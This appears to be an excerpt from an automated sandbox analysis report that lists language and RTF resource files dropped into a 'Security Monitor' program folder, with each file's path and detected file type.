C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\norton_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-1PO1U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2DQMJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2KUMK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-5Q68O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-6OR2S.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-7M1KR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-D5VGT.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-DAFPP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-FUD1N.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-GF9HA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-GLE8G.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-IN9UP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-LJVKK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-M9T24.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-OPQK6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-Q8JL9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-RKDP4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-1HIS4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-28PUJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-29KG2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-2HD8H.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-61I78.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-7E8CV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-AQSP1.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-ARQFI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-C988M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-D6AKK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-ECS17.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-L862D.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-LON1O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-PBOMM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-SKB5J.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-TURVD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-UJ33M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-0HUUT.tmp
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-2U17P.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-3ODUV.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-5TKF1.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-8J1BH.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-EGR32.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-FKAG8.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-H5H85.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-N4H6P.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-OMJG1.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-P4G6I.tmp
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-VUEPE.tmp
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-1JL71.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-ADDU5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-AIGDA.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-ER06U.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-GH4HM.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-HPQVI.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-IA3F6.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-IBM2M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-K4J90.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-M21VG.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-M4MPQ.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-PJHLS.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-RUHIK.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-SP2VU.tmp
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-TJ0TB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-UILOA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-VPREH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\japan.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\korean.lng (copy)
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-0C85I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2C3CC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-4BPAO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
